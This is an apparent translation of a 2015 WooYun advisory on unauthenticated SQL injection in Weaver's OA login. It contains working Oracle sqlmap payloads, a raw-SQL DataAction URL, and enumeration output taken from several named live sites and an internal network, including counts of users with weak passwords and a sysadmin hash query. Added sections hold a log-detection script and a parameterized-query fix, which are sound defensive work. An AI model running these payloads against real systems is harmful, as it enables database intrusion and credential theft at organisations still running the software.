
Vulnerability summary

Defect ID: wooyun-2015-0124589

Title: SQL injection in a widely deployed Weaver (泛微) system (no login required)

Affected vendor: cncert (National Internet Emergency Center of China)

Author: 浮萍

Submitted: 2015-07-05 15:27

Fixed: 2015-08-23 17:14

Published: 2015-08-23 17:14

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (cncert, National Internet Emergency Center of China) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-05: Details sent to the vendor; awaiting vendor handling
2015-07-09: Vendor confirmed; details visible to the vendor only
2015-07-19: Details opened to core white hats and experts in the relevant field
2015-07-29: Details opened to regular white hats
2015-08-08: Details opened to intern white hats
2015-08-23: Details opened to the public

Brief description:

SQL injection

Details:

Taking the vendor's own site as the example:
http://pm.weaver.cn:9085/main/login.jsp

[screenshot: 选区_003.png]

Username sysadmin with any password: the system reports a wrong password.
When the username sysadmin' is entered instead:

[screenshot: 选区_004.png]

the response shows:

org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select longonname from sysuser where lower(longonname)=lower('sysadmin'')]; nested exception is java.sql.SQLSyntaxErrorException: ORA-01756: 引号内的字符串没有正确结束


[screenshot: 选区_005.png]

Initial conclusion: the backend is an Oracle database.
Next, capture the login request:

http://pm.weaver.cn:9085/j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin'


sqlmap identified the following injection points with a total of 213 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: http://pm.weaver.cn:9085/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin') AND 9205=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9205=9205) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND ('bDuh'='bDuh&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: http://pm.weaver.cn:9085/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin') AND 4148=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(112)||CHR(75)||CHR(104),5) AND ('nMaw'='nMaw&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin
---


Confirmed as an Oracle database.
37 databases are available:

back-end DBMS: Oracle
available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3


The current schema is:

current schema (equivalent to database on Oracle):    'EWEAVERINHOUSE'


The login user table is SYSUSER.
Check the number of users:

[screenshot: 选区_006.png]


Likewise, check how many users have the password 123456 (stored as its MD5 hash):

select count(*) from SYSUSER where LOGONPASS = 'e10adc3949ba59abbe56e057f20f883e'


[screenshot: 选区_007.png]


select LOGONPASS from SYSUSER where LONGONNAME = 'sysadmin';

Retrieve the sysadmin password hash; unfortunately decrypting it is a paid service, so I did not decrypt it and log in.
In addition, the vendor's own site can execute SQL directly.
Check the database version:

http://pm.weaver.cn:9085/ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version|20where|20rownum|20=|201


[screenshot: 选区_008.png]

The login submits the password in plaintext.
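For a defender, the two request patterns described above (a login request whose username carries SQL syntax, and any request to the DataAction endpoint with an sql parameter) are cheap to spot in web-server access logs. The following is an added example, not code from the report or from Weaver: it scans constructed access-log lines built from the URLs on this page (client IPs, timestamps and the shortened sqlmap payload are made up) and classifies each line. The path names, parameter names and tokens are taken from the report; the rule names and thresholds are this example's own choices.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines. The request targets are those seen in
# the report (sqlmap payload shortened); IPs, timestamps and sizes are invented.
SAMPLE_LOG = """\
10.1.2.3 - - [05/Jul/2015:15:20:01 +0800] "GET /j_acegi_security_check?j_password=a&j_username=sysadmin&uname=sysadmin HTTP/1.1" 200 512
10.1.2.3 - - [05/Jul/2015:15:20:07 +0800] "GET /j_acegi_security_check?j_password=a&j_username=sysadmin'&uname=sysadmin' HTTP/1.1" 500 2048
10.1.2.3 - - [05/Jul/2015:15:21:30 +0800] "GET /j_acegi_security_check?j_password=a&j_username=sysadmin')%20AND%204148=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73),5)%20AND%20('nMaw'='nMaw&uname=sysadmin HTTP/1.1" 200 512
10.1.2.3 - - [05/Jul/2015:15:22:10 +0800] "GET /ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version HTTP/1.1" 200 1024
10.1.2.4 - - [05/Jul/2015:15:23:00 +0800] "GET /main/login.jsp HTTP/1.1" 200 4096
"""

# Request line inside a combined-format log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

LOGIN_PATH = "/j_acegi_security_check"          # login endpoint from the report
SQL_ENDPOINT = "com.eweaver.base.DataAction"    # endpoint that runs raw SQL
USERNAME_FIELDS = ("j_username", "uname")       # both carry the username

# Tokens drawn from the payloads on the page plus the lone quote that
# triggered the ORA-01756 error. A legitimate login name contains none of them.
SUSPICIOUS = re.compile(
    r"'|\(|\)|\bAND\b|\bOR\b|\bSELECT\b|DBMS_PIPE|XMLTYPE|CHR\(", re.IGNORECASE
)


def classify(line):
    """Return a rule name for a suspicious log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query)  # percent-decodes values, splits on '&'
    # Any hit on the raw-SQL endpoint is worth an alert regardless of content.
    if parts.path.endswith(SQL_ENDPOINT) and "sql" in params:
        return "direct-sql-endpoint"
    if parts.path == LOGIN_PATH:
        for field in USERNAME_FIELDS:
            for value in params.get(field, []):
                if SUSPICIOUS.search(value):
                    return "login-sqli-probe"
    return None


def scan(log_text):
    """Return (line_number, rule) for every flagged line, 1-based."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits


if __name__ == "__main__":
    for n, rule in scan(SAMPLE_LOG):
        print(f"line {n}: {rule}")
```

The quote-only probe (line 2) is the one that matters most operationally: it is what a tester sends first, and in this product it is answered with a stack trace, so a 500 response on the login endpoint paired with a quote in the username is a strong signal on its own.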

Proof of vulnerability:

Case:
http://oa.ad-mart.cn

[screenshot: 选区_009.png]


"http://oa.ad-mart.cn/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin*&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin*" --dbs


Databases:

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


[screenshot: 选区_010.png]

Users whose password is 123456:

[screenshot: 选区_011.png]


http://mail.weifu.com.cn

[screenshot: 选区_012.png]


"http://mail.weifu.com.cn/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin*&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin*" --dbs


Databases:

available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OAWEIFU
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB


Users: select count(*) from sysuser;: '1345'
An internal network of some company:

"http://10.0.0.*/j_acegi_security_check?dynamicpass=&encData=&ip=127.0.0.1&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin*&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin*" --dbs


Databases:

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


List the users,
and separately look up those whose password is 123456, 0000 or 000000:

[screenshot: 选区_014.png]

Remediation:

Filter the input~~

Copyright notice: when reposting, credit the source 浮萍@乌云
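The error message earlier in the report (bad SQL grammar [... lower('sysadmin'')]) shows the username being spliced into the statement text, so the real fix is a bind variable rather than character filtering. The following is an added example, not code from the report or from Weaver's product: it rebuilds the SYSUSER lookup on an in-memory SQLite table (a stand-in for Oracle; the column names come from the error message, the rows are constructed) and runs the same three inputs through a concatenating version and a parameterized version. The tautology input mirrors the structure of the sqlmap payload quoted on the page.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the SYSUSER table named in the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table sysuser (longonname text, logonpass text)")
    conn.executemany(
        "insert into sysuser values (?, ?)",
        [
            ("sysadmin", "e10adc3949ba59abbe56e057f20f883e"),  # md5('123456'), as on the page
            ("alice", "00000000000000000000000000000000"),     # constructed filler row
        ],
    )
    return conn


def lookup_vulnerable(conn, username):
    """String concatenation, which is what the BadSqlGrammarException implies.
    A quote in the username becomes part of the SQL grammar."""
    sql = ("select longonname from sysuser "
           "where lower(longonname)=lower('" + username + "')")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Bind variable: the driver keeps the value out of the SQL text, so
    quotes and parentheses are plain data and cannot change the statement."""
    sql = "select longonname from sysuser where lower(longonname)=lower(?)"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    """Run the same inputs through both versions; returns a dict of outcomes."""
    conn = make_db()
    tautology = "sysadmin') and ('bDuh'='bDuh"   # same shape as the page's payload
    results = {}

    results["normal_vuln"] = lookup_vulnerable(conn, "sysadmin")
    try:
        # The lone quote yields lower('sysadmin'') -> unterminated string,
        # the SQLite counterpart of ORA-01756 seen in the report.
        lookup_vulnerable(conn, "sysadmin'")
        results["quote_vuln"] = "no error"
    except sqlite3.OperationalError as exc:
        results["quote_vuln"] = "syntax error: " + str(exc)
    # Attacker-controlled boolean logic is accepted as part of the WHERE clause.
    results["tautology_vuln"] = lookup_vulnerable(conn, tautology)

    results["normal_param"] = lookup_parameterized(conn, "sysadmin")
    results["quote_param"] = lookup_parameterized(conn, "sysadmin'")      # just an unknown user
    results["tautology_param"] = lookup_parameterized(conn, tautology)   # likewise
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Note that the parameterized version returns an empty result for both hostile inputs without ever raising: there is no error page to leak the query text and no way for the input to alter the WHERE clause, which is exactly what "filtering" alone does not guarantee.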


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-07-09 17:13

Vendor reply:

CNVD confirms the described situation and has notified the software vendor through the handling channel established previously.

Latest status:

None